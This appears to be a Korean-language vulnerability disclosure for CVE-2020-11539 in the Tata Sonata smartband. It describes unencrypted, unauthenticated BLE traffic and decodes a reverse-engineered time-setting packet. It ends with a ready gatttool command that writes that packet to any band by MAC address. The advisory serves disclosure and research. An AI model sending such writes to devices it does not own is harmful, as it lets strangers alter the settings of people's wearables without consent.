
Tata Sonata Smartband의 부적절한 접근 제어
설명: 스마트 밴드에 페어링 기능이 없으며 (모드 0 BLE 보안 수준), 공기 중에 전송되는 데이터가 암호화되지 않는 것으로 확인되었습니다. 게다가 스마트 밴드로 전송되는 데이터에는 인증이나 서명 검증이 없기 때문에, 공격자가 스마트 장치의 매개변수를 제어할 수 있습니다.
영향을 받는 버전: Smart SF Rush - 1.12
연구자: Sayli Ambure (https://twitter.com/sayli_ambure)
MITRE CVE 링크: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11539
다음 패킷은 역분석을 통해 시간 변경용임을 확인했으며, 휴대폰에서 hcisnoop 덤프를 추출하여 더 많은 패킷을 역분석할 수 있습니다.
데이터 값: 00870e00141401060712052b051e
| 데이터 Hexdump: | 00 | 87 | 0e | 00 | 14 | 14 | 01 | 06 | 07 | 12 | 05 | 2b | 05 | 1e |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 데이터 10진수: | 00 | 135 | 14 | 00 | 20 | 20 | 01 | 06 | 07 | 18 | 05 | 43 | 05 | 30 |
00 87: 패킷 헤더
0e 00: 패킷 유형
14 14: 10진수 연도 (2020)
01 06: 월과 일 (1월 6일)
07 12: 10진수 시와 분 (오전 07:18)
05 : 초
gatttool -t random -b <mac-address> --char-write-req -a 0xe -n 00870e00141401060712052b051e